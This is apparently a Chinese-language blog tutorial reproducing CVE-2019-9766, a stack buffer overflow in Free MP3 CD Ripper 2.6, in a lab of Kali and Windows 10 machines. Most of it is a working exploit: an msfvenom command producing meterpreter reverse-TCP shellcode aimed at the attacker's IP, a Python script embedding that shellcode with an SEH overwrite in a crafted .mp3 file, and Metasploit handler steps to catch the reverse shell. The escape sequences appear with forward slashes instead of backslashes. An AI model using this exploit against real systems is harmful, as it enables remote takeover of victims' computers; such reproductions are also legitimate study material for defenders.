如何实现Free MP3 CD Ripper缓冲区溢出远程代码执行漏洞CVE-2019-9766复现,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。
漏洞简介:
Free MP3 CD Ripper是一款音频格式转换器。
Free MP3 CD Ripper 2.6版本中存在栈缓冲区溢出漏洞。远程攻击者可借助特制的.mp3文件利用该漏洞执行任意代码。
威胁类型
远程代码执行
威胁等级
高
漏洞编号
CVE-2019-9766
受影响系统及应用版本
Free MP3 CD Ripper 2.6
漏洞复现:
攻击机:kali2020 、kali2019
ip:192.168.6.146
受害机:win10
ip:192.168.6.142
安装Free MP3 CD Ripper 2.6版本
1、搭建环境
Win10下载安装Free MP3 CD Ripper 2.6版本
利用msf生成反向连接的shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.6.146 lport=888 -f c --smallest
替换脚本中的shellcode.
编写生成.Mp3文件的脚本
#Stack-based buffer overflow in Free MP3 CD Ripper 2.6 buffer="A"*4116 NSEH="/xeb/x06/x90/x90" SEH="/x84/x20/xe4/x66" nops="/x90"*5 buf="" buf="/xfc/xe8/x82/x00/x00/x00/x60/x89/xe5/x31/xc0/x64/x8b/x50/x30" buf="/x8b/x52/x0c/x8b/x52/x14/x8b/x72/x28/x0f/xb7/x4a/x26/x31/xff" buf="/xac/x3c/x61/x7c/x02/x2c/x20/xc1/xcf/x0d/x01/xc7/xe2/xf2/x52" buf="/x57/x8b/x52/x10/x8b/x4a/x3c/x8b/x4c/x11/x78/xe3/x48/x01/xd1" buf="/x51/x8b/x59/x20/x01/xd3/x8b/x49/x18/xe3/x3a/x49/x8b/x34/x8b" buf="/x01/xd6/x31/xff/xac/xc1/xcf/x0d/x01/xc7/x38/xe0/x75/xf6/x03" buf="/x7d/xf8/x3b/x7d/x24/x75/xe4/x58/x8b/x58/x24/x01/xd3/x66/x8b" buf="/x0c/x4b/x8b/x58/x1c/x01/xd3/x8b/x04/x8b/x01/xd0/x89/x44/x24" buf="/x24/x5b/x5b/x61/x59/x5a/x51/xff/xe0/x5f/x5f/x5a/x8b/x12/xeb" buf="/x8d/x5d/x68/x33/x32/x00/x00/x68/x77/x73/x32/x5f/x54/x68/x4c" buf="/x77/x26/x07/x89/xe8/xff/xd0/xb8/x90/x01/x00/x00/x29/xc4/x54" buf="/x50/x68/x29/x80/x6b/x00/xff/xd5/x6a/x0a/x68/xc0/xa8/x6e/x84" buf="/x68/x02/x00/x03/x78/x89/xe6/x50/x50/x50/x50/x40/x50/x40/x50" buf="/x68/xea/x0f/xdf/xe0/xff/xd5/x97/x6a/x10/x56/x57/x68/x99/xa5" buf="/x74/x61/xff/xd5/x85/xc0/x74/x0c/xff/x4e/x08/x75/xec/x68/xf0" buf="/xb5/xa2/x56/xff/xd5/x6a/x00/x6a/x04/x56/x57/x68/x02/xd9/xc8" buf="/x5f/xff/xd5/x8b/x36/x6a/x40/x68/x00/x10/x00/x00/x56/x6a/x00" buf="/x68/x58/xa4/x53/xe5/xff/xd5/x93/x53/x6a/x00/x56/x53/x57/x68" buf="/x02/xd9/xc8/x5f/xff/xd5/x01/xc3/x29/xc6/x75/xee/xc3"; pad="B"*(316-len(nops)-len(buf)) payload=buffer+NSEH+SEH+nops+buf+pad try: f=open("Test_Free_MP3.mp3","w") print ("[+]Creating %s bytes mp3 Files..."%len(payload)) f.write(payload) f.close() print ("[+]mp3 File created successfully!") except: print ("File cannot be created!")
运行脚本,生成一个.MP3的文件
将生成的.mp3文件放到win10上(需要VMtools)
kali开启msfconsole
使用exploit/multi/handler模块
设置lhost,lport,攻击载荷
Kali开启监听:
Win10使用free MP3 CD ripper 打开mp3文件
接收反弹的shell
执行命令
漏洞利用成功
PS: 说一个我踩的坑吧,真的头一次遇到这种情况:
漏洞利用攻击机需要用kali2019版本,2020版本不可以利用。用2020试了好多遍都没有成功,最后鬼使神差的用了2019就成功了。有遇到过这样情况的大佬分享一下经验吗。
2、修复建议
及时更新Free MP3 CD Ripper到最新版本
看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注亿速云行业资讯频道,感谢您对亿速云的支持。
原创文章,作者:bd101bd101,如若转载,请注明出处:https://blog.ytso.com/tech/safety/221474.html